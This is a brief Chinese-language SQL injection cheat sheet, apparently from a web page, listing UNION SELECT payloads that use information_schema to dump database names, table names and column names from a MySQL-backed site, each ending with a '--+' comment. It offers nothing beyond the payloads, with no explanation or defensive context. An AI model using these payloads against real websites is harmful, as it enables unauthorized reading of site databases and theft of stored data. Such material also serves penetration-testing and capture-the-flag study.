id后的符号视情况而定
爆数据库
union select 1,group_concat(schema_name),3 from information_schema.schemata--+
union select 1,(select group_concat(schema_name) from information_schema.schemata),3--+
爆数据表
union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=' '--+
爆数据表的列
union select 1,group_concat(column_name),3 from information_schema.columns where table_name=' '--+
网友评论